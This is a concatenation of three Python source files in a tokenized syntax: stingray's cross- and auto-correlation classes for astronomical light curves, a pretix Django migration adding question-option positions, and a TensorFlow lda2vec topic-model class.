<import_stmt>warnings<import_stmt>numpy<as>np<import_from_stmt>scipy signal<try_stmt><block_start><import_from_stmt>pyfftw.interfaces.scipy_fft ifft fftfreq<block_end><except_stmt>ImportError<block_start>warnings.warn("pyfftw not installed. Using standard scipy fft")<import_from_stmt>scipy.fft ifft fftfreq<block_end><import_from_stmt>stingray.lightcurve Lightcurve<import_from_stmt>stingray.crossspectrum Crossspectrum AveragedCrossspectrum<import_from_stmt>stingray.exceptions StingrayError<import_stmt>stingray.utils<as>utils<line_sep>__all__=['CrossCorrelation' 'AutoCorrelation']<class_stmt>CrossCorrelation(object)<block_start>"""Make a cross-correlation from light curves or a cross spectrum.
You can also make an empty :class:`Crosscorrelation` object to populate
with your own cross-correlation data.
Parameters
----------
lc1: :class:`stingray.Lightcurve` object, optional, default ``None``
The first light curve data for correlation calculations.
lc2: :class:`stingray.Lightcurve` object, optional, default ``None``
The light curve data for the correlation calculations.
cross: :class: `stingray.Crossspectrum` object, default ``None``
The cross spectrum data for the correlation calculations.
mode: {``full``, ``valid``, ``same``}, optional, default ``same``
A string indicating the size of the correlation output.
See the relevant ``scipy`` documentation [scipy-docs]_
for more details.
Attributes
----------
lc1: :class:`stingray.Lightcurve`
The first light curve data for correlation calculations.
lc2: :class:`stingray.Lightcurve`
The light curve data for the correlation calculations.
cross: :class: `stingray.Crossspectrum`
The cross spectrum data for the correlation calculations.
corr: numpy.ndarray
An array of correlation data calculated from two light curves
time_lags: numpy.ndarray
An array of all possible time lags against which each point in corr is calculated
dt: float
The time resolution of each light curve (used in ``time_lag`` calculations)
time_shift: float
Time lag that gives maximum value of correlation between two light curves.
There will be maximum correlation between light curves if one of the light curve
is shifted by ``time_shift``.
n: int
Number of points in ``self.corr`` (length of cross-correlation data)
auto: bool
An internal flag to indicate whether this is a cross-correlation or an auto-correlation.
References
----------
.. [scipy-docs] https://docs.scipy.org/doc/scipy-0.19.0/reference/generated/scipy.signal.correlate.html
"""<def_stmt>__init__ self lc1=<none> lc2=<none> cross=<none> mode='same'<block_start>self.auto=<false><if_stmt>isinstance(mode str)<is><false><block_start><raise>TypeError("mode must be a string")<block_end><if_stmt>mode.lower()<not><in>["full" "valid" "same"]<block_start><raise>ValueError("mode must be 'full', 'valid' or 'same'!")<block_end>self.mode=mode.lower()<line_sep>self.lc1=<none><line_sep>self.lc2=<none><line_sep>self.cross=<none><line_sep># Populate all attributes by ``None` if user passes no lightcurve data
<if_stmt>lc1<is><none><or>lc2<is><none><block_start><if_stmt>lc1<is><not><none><or>lc2<is><not><none><block_start><raise>TypeError("You can't do a cross correlation with just one "<concat>"light curve!")<block_end><else_stmt><block_start><if_stmt>cross<is><none># all object input params are ``None``
<block_start>self.corr=<none><line_sep>self.time_shift=<none><line_sep>self.time_lags=<none><line_sep>self.dt=<none><line_sep>self.n=<none><block_end><else_stmt><block_start>self._make_cross_corr(cross)<line_sep><return><block_end><block_end><block_end><else_stmt><block_start>self._make_corr(lc1 lc2)<block_end><block_end><def_stmt>_make_cross_corr self cross<block_start>"""
Do some checks on the cross spectrum supplied to the method,
and then calculate the time shifts, time lags and cross correlation.
Parameters
----------
cross: :class:`stingray.Crossspectrum` object
The crossspectrum, averaged or not.
"""<if_stmt><not>isinstance(cross Crossspectrum)<block_start><if_stmt><not>isinstance(cross AveragedCrossspectrum)<block_start><raise>TypeError("cross must be a crossspectrum.Crossspectrum \
or crossspectrum.AveragedCrossspectrum object")<block_end><block_end><if_stmt>self.cross<is><none><block_start>self.cross=cross<line_sep>self.dt=1/(cross.df<times>cross.n)<block_end><if_stmt>self.dt<is><none><block_start>self.dt=1/(cross.df<times>cross.n)<block_end>prelim_corr=abs(ifft(cross.power).real)# keep only the real
self.n=len(prelim_corr)<line_sep># ifft spits out an array that looks like [0,1,...n,-n,...-1]
# where n is the last positive frequency
# correcting for this by putting them in order
times=fftfreq(self.n cross.df)<line_sep>time,corr=np.array(sorted(zip(times prelim_corr))).T<line_sep>self.corr=corr<line_sep>self.time_shift,self.time_lags,self.n=self.cal_timeshift(dt=self.dt)<block_end><def_stmt>_make_corr self lc1 lc2<block_start>"""
Do some checks on the light curves supplied to the method, and then calculate the time
shifts, time lags and cross correlation.
Parameters
----------
lc1::class:`stingray.Lightcurve` object
The first light curve data.
lc2::class:`stingray.Lightcurve` object
The second light curve data.
"""<if_stmt><not>isinstance(lc1 Lightcurve)<block_start><raise>TypeError("lc1 must be a lightcurve.Lightcurve object")<block_end><if_stmt><not>isinstance(lc2 Lightcurve)<block_start><raise>TypeError("lc2 must be a lightcurve.Lightcurve object")<block_end><if_stmt><not>np.isclose(lc1.dt lc2.dt)<block_start><raise>StingrayError("Light curves do not have "<concat>"same time binning dt.")<block_end><else_stmt># ignore very small differences in dt neglected by np.isclose()
<block_start>lc1.dt=lc2.dt<line_sep>self.dt=lc1.dt<block_end># self.lc1 and self.lc2 may get assigned values explicitly in which case there is no need to copy data
<if_stmt>self.lc1<is><none><block_start>self.lc1=lc1<block_end><if_stmt>self.lc2<is><none><block_start>self.lc2=lc2<block_end># Subtract means before passing scipy.signal.correlate into correlation
lc1_counts=self.lc1.counts-np.mean(self.lc1.counts)<line_sep>lc2_counts=self.lc2.counts-np.mean(self.lc2.counts)<line_sep># Calculates cross-correlation of two lightcurves
self.corr=signal.correlate(lc1_counts lc2_counts self.mode)<line_sep>self.n=len(self.corr)<line_sep>self.time_shift,self.time_lags,self.n=self.cal_timeshift(dt=self.dt)<block_end><def_stmt>cal_timeshift self dt=1.0<block_start>"""
Calculate the cross correlation against all possible time lags, both positive and negative.
Parameters
----------
dt: float, optional, default ``1.0``
Time resolution of the light curve, should be passed when object is populated with
correlation data and no information about light curve can be extracted. Used to
calculate ``time_lags``.
Returns
-------
self.time_shift: float
Value of the time lag that gives maximum value of correlation between two light curves.
self.time_lags: numpy.ndarray
An array of ``time_lags`` calculated from correlation data
"""<if_stmt>self.dt<is><none><block_start>self.dt=dt<block_end><if_stmt>self.corr<is><none><block_start><if_stmt>(self.lc1<is><none><or>self.lc2<is><none>)<and>(self.cross<is><none>)<block_start><raise>StingrayError('Please provide either two lightcurve objects or \
a [average]crossspectrum object to calculate correlation and time_shift')<block_end><else_stmt># This will cover very rare case of assigning self.lc1 and lc2
# or self.cross and also self.corr = ``None``.
# In this case, correlation is calculated using self.lc1
# and self.lc2 and using that correlation data,
# time_shift is calculated.
<block_start><if_stmt>self.cross<is><not><none><block_start>self._make_cross_corr(self.cross)<block_end><else_stmt><block_start>self._make_corr(self.lc1 self.lc2)<block_end><block_end><block_end>self.n=len(self.corr)<line_sep>dur=int(self.n/2)<line_sep># Correlation against all possible lags, positive as well as negative lags are stored
x_lags=np.linspace(-dur dur self.n)<line_sep>self.time_lags=x_lags<times>self.dt<line_sep># time_shift is the time lag for max. correlation
self.time_shift=self.time_lags[np.argmax(self.corr)]<line_sep><return>self.time_shift self.time_lags self.n<block_end><def_stmt>plot self labels=<none> axis=<none> title=<none> marker='-' save=<false> filename=<none> ax=<none><block_start>"""
Plot the :class:`Crosscorrelation` as function using Matplotlib.
Plot the Crosscorrelation object on a graph ``self.time_lags`` on x-axis and
``self.corr`` on y-axis
Parameters
----------
labels : iterable, default ``None``
A list of tuple with ``xlabel`` and ``ylabel`` as strings.
axis : list, tuple, string, default ``None``
Parameter to set axis properties of ``matplotlib`` figure. For example
it can be a list like ``[xmin, xmax, ymin, ymax]`` or any other
acceptable argument for ``matplotlib.pyplot.axis()`` function.
title : str, default ``None``
The title of the plot.
marker : str, default ``-``
Line style and color of the plot. Line styles and colors are
combined in a single format string, as in ``'bo'`` for blue
circles. See ``matplotlib.pyplot.plot`` for more options.
save : boolean, optional (default=False)
If True, save the figure with specified filename.
filename : str
File name of the image to save. Depends on the boolean ``save``.
ax : ``matplotlib.Axes`` object
An axes object to fill with the cross correlation plot.
"""<try_stmt><block_start><import_stmt>matplotlib.pyplot<as>plt<block_end><except_stmt>ImportError<block_start><raise>ImportError("Matplotlib required for plot()")<block_end><if_stmt>ax<is><none><block_start>fig,ax=plt.subplots(1 1 figsize=(6 4))<block_end>ax.plot(self.time_lags self.corr marker)<if_stmt>labels<is><not><none><block_start><try_stmt><block_start>ax.set_xlabel(labels[0])<line_sep>ax.set_ylabel(labels[1])<block_end><except_stmt>TypeError<block_start>utils.simon("``labels`` must be either a list or tuple with "<concat>"x and y labels.")<line_sep><raise><block_end><except_stmt>IndexError<block_start>utils.simon("``labels`` must have two labels for x and y "<concat>"axes.")<line_sep># Not raising here because in case of len(labels)==1, only
# x-axis will be labelled.
<block_end><block_end># axis is a tuple containing formatting information
<if_stmt>axis<is><not><none><block_start>ax.axis(axis)<block_end><if_stmt>title<is><not><none><block_start>ax.set_title(title)<block_end><if_stmt>save<block_start><if_stmt>filename<is><none><block_start>plt.savefig('corr.pdf' format="pdf")<block_end><else_stmt><block_start>plt.savefig(filename)<block_end><block_end><else_stmt><block_start>plt.show(block=<false>)<block_end><return>ax<block_end><block_end><class_stmt>AutoCorrelation(CrossCorrelation)<block_start>"""
Make an auto-correlation from a light curve.
You can also make an empty Autocorrelation object to populate with your
own auto-correlation data.
Parameters
----------
lc: :class:`stingray.Lightcurve` object, optional, default ``None``
The light curve data for correlation calculations.
mode: {``full``, ``valid``, ``same``}, optional, default ``same``
A string indicating the size of the correlation output.
See the relevant ``scipy`` documentation [scipy-docs]
for more details.
Attributes
----------
lc1, lc2::class:`stingray.Lightcurve`
The light curve data for correlation calculations.
corr: numpy.ndarray
An array of correlation data calculated from lightcurve data
time_lags: numpy.ndarray
An array of all possible time lags against which each point in corr is calculated
dt: float
The time resolution of each lightcurve (used in time_lag calculations)
time_shift: float, zero
Max. Value of AutoCorrelation is always at zero lag.
n: int
Number of points in self.corr(Length of auto-correlation data)
"""<def_stmt>__init__ self lc=<none> mode='same'<block_start>CrossCorrelation.__init__(self lc1=lc lc2=lc mode=mode)<line_sep>self.auto=<true><block_end><block_end>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-03-03 16:41
<import_from_future_stmt> unicode_literals<import_from_stmt>django.db migrations models<def_stmt>set_position apps schema_editor<block_start>Question=apps.get_model('pretixbase' 'Question')<for_stmt>q Question.objects.all()<block_start><for_stmt>i,option enumerate(q.options.all())<block_start>option.position=i<line_sep>option.save()<block_end><block_end><block_end><class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('pretixbase' '0083_auto_20180228_2102') ]<line_sep>operations=[migrations.AlterModelOptions(name='questionoption' options={'ordering':('position' 'id') 'verbose_name':'Question option' 'verbose_name_plural':'Question options'} ) migrations.AddField(model_name='questionoption' name='position' field=models.IntegerField(default=0) ) migrations.AlterField(model_name='question' name='position' field=models.PositiveIntegerField(default=0 verbose_name='Position') ) migrations.RunPython(set_position reverse_code=migrations.RunPython.noop ) ]<block_end>
|
<import_stmt>tensorflow<as>tf<import_stmt>numpy<as>np<import_stmt>lda2vec.word_embedding<as>W<import_stmt>lda2vec.embedding_mixture<as>M<import_stmt>lda2vec.dirichlet_likelihood<as>DL<import_from_stmt>lda2vec utils<import_from_stmt>datetime datetime<import_stmt>warnings<line_sep>warnings.filterwarnings("ignore" category=DeprecationWarning)<class_stmt>Lda2vec<block_start>RESTORE_KEY='to_restore'<def_stmt>__init__ self num_unique_documents vocab_size num_topics freqs=<none> save_graph_def=<true> embedding_size=128 num_sampled=40 learning_rate=0.001 lmbda=200.0 alpha=<none> power=0.75 batch_size=500 logdir='logdir' restore=<false> fixed_words=<false> factors_in=<none> pretrained_embeddings=<none><block_start>"""Summary
Args:
num_unique_documents (int): Number of unique documents in your dataset
vocab_size (int): Number of unique words/tokens in your dataset
num_topics (int): The set number of topics to cluster your data into
freqs (list, optional): Python list of length vocab_size with frequencies of each token
save_graph_def (bool, optional): If true, we will save the graph to logdir
embedding_size (int, optional): Dimension of the embeddings. This will be shared between docs, words, and topics.
num_sampled (int, optional): Negative sampling number for NCE Loss.
learning_rate (float, optional): Learning rate for optimizer
lmbda (float, optional): Strength of dirichlet prior
alpha (None, optional): alpha of dirichlet process (defaults to 1/n_topics)
power (float, optional): unigram sampler distortion
batch_size (int, optional): Batch size coming into model
logdir (str, optional): Location for models to be saved - note, we will append on the datetime too on each run
restore (bool, optional): When True, we will restore the model from the logdir parameter's location
fixed_words (bool, optional): Description
factors_in (None, optional): Pretrained Topic Embedding (shape should be [num_topics, embedding_size])
pretrained_embeddings (None, optional): Description
"""<line_sep>self.config=tf.ConfigProto()<line_sep>self.config.gpu_options.allow_growth=<true><line_sep>self.sesh=tf.Session(config=self.config)<line_sep>self.moving_avgs=tf.train.ExponentialMovingAverage(0.9)<line_sep>self.num_unique_documents=num_unique_documents<line_sep>self.vocab_size=vocab_size<line_sep>self.num_topics=num_topics<line_sep>self.freqs=freqs<line_sep>self.save_graph_def=save_graph_def<line_sep>self.logdir=logdir<line_sep>self.embedding_size=embedding_size<line_sep>self.num_sampled=num_sampled<line_sep>self.learning_rate=learning_rate<line_sep>self.lmbda=lmbda<line_sep>self.alpha=alpha<line_sep>self.power=power<line_sep>self.batch_size=batch_size<line_sep>self.pretrained_embeddings=pretrained_embeddings<line_sep>self.factors_in=factors_in<line_sep>self.compute_normed=<false><line_sep>self.fixed_words=fixed_words<if_stmt><not>restore<block_start>self.date=datetime.now().strftime('%y%m%d_%H%M')<line_sep>self.logdir=('{}_{}').format(self.logdir self.date)<line_sep># Load pretrained embeddings if provided.
<if_stmt>isinstance(pretrained_embeddings np.ndarray)<block_start>W_in=tf.constant(pretrained_embeddings name="word_embedding")<if>fixed_words<else>tf.get_variable("word_embedding" shape=[self.vocab_size self.embedding_size] initializer=tf.constant_initializer(pretrained_embeddings))<block_end><else_stmt><block_start>W_in=<none><block_end># Initialize the word embedding
self.w_embed=W.Word_Embedding(self.embedding_size self.vocab_size self.num_sampled W_in=W_in freqs=self.freqs power=self.power)<line_sep># Initialize the Topic-Document Mixture
self.mixture=M.EmbedMixture(self.num_unique_documents self.num_topics self.embedding_size)<line_sep># Builds the graph and returns variables within it
handles=self._build_graph()<for_stmt>handle handles<block_start>tf.add_to_collection(Lda2vec.RESTORE_KEY handle)<block_end># Add Word Embedding Variables to collection
tf.add_to_collection(Lda2vec.RESTORE_KEY self.w_embed.embedding)<line_sep>tf.add_to_collection(Lda2vec.RESTORE_KEY self.w_embed.nce_weights)<line_sep>tf.add_to_collection(Lda2vec.RESTORE_KEY self.w_embed.nce_biases)<line_sep># Add Doc Mixture Variables to collection
tf.add_to_collection(Lda2vec.RESTORE_KEY self.mixture.doc_embedding)<line_sep>tf.add_to_collection(Lda2vec.RESTORE_KEY self.mixture.topic_embedding)<line_sep>(self.x self.y self.docs self.step self.switch_loss self.word_context self.doc_context self.loss_word2vec self.fraction self.loss_lda self.loss self.loss_avgs_op self.optimizer self.merged)=handles<block_end><else_stmt><block_start>meta_graph=logdir+'/model.ckpt'<line_sep>tf.train.import_meta_graph(meta_graph+'.meta').restore(self.sesh meta_graph)<line_sep>handles=self.sesh.graph.get_collection(Lda2vec.RESTORE_KEY)<line_sep>(self.x self.y self.docs self.step self.switch_loss self.word_context self.doc_context self.loss_word2vec self.fraction self.loss_lda self.loss self.loss_avgs_op self.optimizer self.merged embedding nce_weights nce_biases doc_embedding topic_embedding)=handles<line_sep>self.w_embed=W.Word_Embedding(self.embedding_size self.vocab_size self.num_sampled W_in=embedding freqs=self.freqs power=self.power nce_w_in=nce_weights nce_b_in=nce_biases)<line_sep># Initialize the Topic-Document Mixture
self.mixture=M.EmbedMixture(self.num_unique_documents self.num_topics self.embedding_size W_in=doc_embedding factors_in=topic_embedding)<block_end><block_end><def_stmt>prior self<block_start>"""Computes Dirichlet Prior.
Returns:
TYPE: Dirichlet Prior Value
"""<line_sep>doc_prior=DL.dirichlet_likelihood(self.mixture.doc_embedding alpha=self.alpha)<line_sep><return>doc_prior<block_end><def_stmt>_build_graph self<block_start>"""Builds the Lda2vec model graph.
"""<line_sep># Model Inputs
# Pivot Words
x=tf.placeholder(tf.int32 shape=[<none>] name='x_pivot_idxs')<line_sep># Context/Target Words
y=tf.placeholder(tf.int64 shape=[<none>] name='y_target_idxs')<line_sep># Document ID
docs=tf.placeholder(tf.int32 shape=[<none>] name='doc_ids')<line_sep># Global Step
step=tf.Variable(0 trainable=<false> name='global_step')<line_sep># What epoch should we switch on lda loss?
switch_loss=tf.Variable(0 trainable=<false>)<line_sep># Word embedding lookup
word_context=tf.nn.embedding_lookup(self.w_embed.embedding x name='word_embed_lookup')<line_sep># Document Context via document ID lookup
doc_context=self.mixture(doc_ids=docs)<line_sep># Compile word + doc context in list and add them together
contexts_to_add=[word_context doc_context]<line_sep>context=tf.add_n(contexts_to_add name='context_vector')<line_sep># Compute Word2Vec Loss
<with_stmt>tf.name_scope('nce_loss')<block_start>loss_word2vec=self.w_embed(context y)<line_sep>tf.summary.scalar('nce_loss' loss_word2vec)<block_end># Compute LDA Loss
<with_stmt>tf.name_scope('lda_loss')<block_start>fraction=tf.Variable(1 trainable=<false> dtype=tf.float32 name='fraction')<line_sep>loss_lda=self.lmbda<times>fraction<times>self.prior()<line_sep>tf.summary.scalar('lda_loss' loss_lda)<block_end># Determine if we should be using only word2vec loss or if we should add in LDA loss based on switch_loss Variable
loss=tf.cond(step<l>switch_loss <lambda>:loss_word2vec <lambda>:loss_word2vec+loss_lda)<line_sep># Add current loss to moving average of loss
loss_avgs_op=self.moving_avgs.apply([loss_lda loss_word2vec loss])<line_sep># Init the optimizer
<with_stmt>tf.control_dependencies([loss_avgs_op])<block_start>optimizer=tf.contrib.layers.optimize_loss(loss tf.train.get_global_step() self.learning_rate 'Adam' name='Optimizer')<block_end># Initialize all variables
self.sesh.run(tf.global_variables_initializer() options=tf.RunOptions(report_tensor_allocations_upon_oom=<true>))<line_sep># Create a merged summary of variables
merged=tf.summary.merge_all()<line_sep>to_return=[x y docs step switch_loss word_context doc_context loss_word2vec fraction loss_lda loss loss_avgs_op optimizer merged]<line_sep><return>to_return<block_end><def_stmt>train self pivot_words target_words doc_ids data_size num_epochs switch_loss_epoch=0 save_every=1 report_every=1 print_topics_every=5 idx_to_word=<none><block_start>"""Train the Lda2vec Model. pivot_words, target_words, and doc_ids should be
the same size.
Args:
pivot_words (np.array): Array of word idxs corresponding to pivot words
target_words (np.array): Array of word idxs corresponding to target words
doc_ids (TYPE): Document IDs linking word idxs to their docs
data_size (TYPE): Length of pivot_words array
num_epochs (TYPE): Number of epochs to train model
switch_loss_epoch (int, optional): Epoch to switch on LDA loss. LDA loss not learned
until this epoch
save_every (int, optional): Save model every "save_every" epoch
report_every (int, optional): Report model metrics every "report_every" epoch.
print_topics_every (int, optional): Print top 10 words in each topic every "print_topics_every"
idx_to_word (None, optional): IDX to word mapping - Required if you want to see word-topic membership
"""<line_sep># Calculate fraction used in DL Loss calculation
temp_fraction=self.batch_size<times>1.0/data_size<line_sep># Assign the fraction placeholder variable with the value we calculated
self.sesh.run(tf.assign(self.fraction temp_fraction))<line_sep># Calculate the number of iterations per epoch so we can figure out when to switch the loss
iters_per_epoch=int(data_size/self.batch_size)+np.ceil(data_size%self.batch_size)<line_sep># Calculate what step we would be on @ the switch loss epoch
switch_loss_step=iters_per_epoch<times>switch_loss_epoch<line_sep># Assign the switch loss variable with the step we just calculated
self.sesh.run(tf.assign(self.switch_loss switch_loss_step))<if_stmt>self.save_graph_def# Initialize a tensorflow Saver object
<block_start>saver=tf.train.Saver()<line_sep># Initialize a tensorflow summary writer so we can save logs
writer=tf.summary.FileWriter(self.logdir+'/' graph=self.sesh.graph)<block_end># Iterate over the number of epochs we want to train for
<for_stmt>e range(num_epochs)<block_start>print('\nEPOCH:' e+1)<line_sep># Get a batch worth of data
<for_stmt>p,t,d utils.chunks(self.batch_size pivot_words target_words doc_ids)# Create the feed dict from the batched data
<block_start>feed_dict={self.x:p self.y:t self.docs:d}<line_sep># Values we want to fetch whenever we run the model
fetches=[self.merged self.optimizer self.loss self.loss_word2vec self.loss_lda self.step]<line_sep># Run a step of the model
summary,_,l,lw2v,llda,step=self.sesh.run(fetches feed_dict=feed_dict)<block_end># Prints log every "report_every" epoch
<if_stmt>(e+1)%report_every<eq>0<block_start>print('LOSS' l 'w2v' lw2v 'lda' llda)<block_end># Saves model every "save_every" epoch
<if_stmt>(e+1)%save_every<eq>0<and>self.save_graph_def<block_start>writer.add_summary(summary step)<line_sep>writer.flush()<line_sep>writer.close()<line_sep>save_path=saver.save(self.sesh self.logdir+'/model.ckpt')<line_sep>writer=tf.summary.FileWriter(self.logdir+'/' graph=self.sesh.graph)<block_end># Prints out membership of words in each topic every "print_topics_every" epoch
<if_stmt>e<g>0<and>(e+1)%print_topics_every<eq>0<block_start>idxs=np.arange(self.num_topics)<line_sep>words,sims=self.get_k_closest(idxs in_type='topic' idx_to_word=idx_to_word k=10 verbose=<true>)<block_end><block_end># Save after all epochs are finished, but only if we didn't just save
<if_stmt>self.save_graph_def<and>(e+1)%save_every<ne>0<block_start>writer.add_summary(summary step)<line_sep>writer.flush()<line_sep>writer.close()<line_sep>save_path=saver.save(self.sesh self.logdir+'/model.ckpt')<block_end><block_end><def_stmt>compute_normed_embeds self<block_start>"""Normalizes embeddings so we can measure cosine similarity
between different embedding matrixes.
"""<line_sep>self.normed_embed_dict={}<line_sep>norm=tf.sqrt(tf.reduce_sum(self.mixture.topic_embedding<power>2 1 keep_dims=<true>))<line_sep>self.normed_embed_dict['topic']=self.mixture.topic_embedding/norm<line_sep>norm=tf.sqrt(tf.reduce_sum(self.w_embed.embedding<power>2 1 keep_dims=<true>))<line_sep>self.normed_embed_dict['word']=self.w_embed.embedding/norm<line_sep>norm=tf.sqrt(tf.reduce_sum(self.mixture.doc_embedding<power>2 1 keep_dims=<true>))<line_sep>self.normed_embed_dict['doc']=self.mixture.doc_embedding/norm<line_sep>self.idxs_in=tf.placeholder(tf.int32 shape=[<none>] name='idxs')<line_sep>self.compute_normed=<true><block_end><def_stmt>get_k_closest self idxs in_type='word' vs_type='word' k=10 idx_to_word=<none> verbose=<false><block_start>"""Gets k closest vs_type embeddings for every idx of in_type embedding given.
Options for the in_type and vs_type are ["word", "topic", "doc"].
Args:
idxs (np.array): Array of indexes you want to get similarities to
in_type (str, optional): idxs will query this embedding matrix
vs_type (str, optional): embeddings to compare to in_type embedding lookup
k (int, optional): Number of vs_type embeddings to return per idx
idx_to_word (dict, optional): IDX to word mapping
verbose (bool, optional): Should we print out the top k words per epoch? False by default.
Only prints if idx_to_word is passed too.
Returns:
sim: Actual embeddings that are similar to each idx. shape [idxs.shape[0], k, self.embed_size]
sim_idxs: Indexes of the sim embeddings. shape [idxs.shape[0], k]
NOTE: Acceptable pairs include:
word - word
word - topic
topic - word
doc - doc
"""<if_stmt>self.compute_normed<eq><false><block_start>self.compute_normed_embeds()<block_end>self.batch_array=tf.nn.embedding_lookup(self.normed_embed_dict[in_type] self.idxs_in)<line_sep>self.cosine_similarity=tf.matmul(self.batch_array tf.transpose(self.normed_embed_dict[vs_type] [1 0]))<line_sep>feed_dict={self.idxs_in:idxs}<line_sep>sim,sim_idxs=self.sesh.run(tf.nn.top_k(self.cosine_similarity k=k) feed_dict=feed_dict)<if_stmt>idx_to_word<block_start><if_stmt>verbose<and>vs_type<eq>"word"<block_start>print('---------Closest {} words to given indexes----------'.format(k))<block_end><for_stmt>i,idx enumerate(idxs)<block_start><if_stmt>in_type<eq>'word'<block_start>in_word=idx_to_word[idx]<block_end><else_stmt><block_start>in_word='Topic '+str(idx)<block_end>vs_word_list=[]<for_stmt>vs_i range(sim_idxs[i].shape[0])<block_start>vs_idx=sim_idxs[i][vs_i]<line_sep>vs_word=idx_to_word[vs_idx]<line_sep>vs_word_list.append(vs_word)<block_end><if_stmt>verbose<and>vs_type<eq>"word"<block_start>print(in_word ':' (', ').join(vs_word_list))<block_end><block_end><block_end><return>(sim sim_idxs)<block_end><def_stmt>save_weights_to_file self word_embed_path='word_weights' doc_embed_path='doc_weights' topic_embed_path='topic_weights'<block_start>"""Saves embedding matrixes to file.
Args:
word_embed_path (str, optional): Path and name where you want to save word embeddings
doc_embed_path (str, optional): Path and name where you want to save doc embeddings
topic_embed_path (str, optional): Path and name where you want to save topic embeddings
"""<line_sep>word_embeds=self.sesh.run(self.word_embedding)<line_sep>np.save(word_embed_path word_embeds)<line_sep>doc_embeds=self.sesh.run(self.doc_embedding)<line_sep>np.save(doc_embed_path doc_embeds)<line_sep>topic_embeds=self.sesh.run(self.topic_embedding)<line_sep>np.save(topic_embed_path topic_embeds)<block_end><block_end>
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.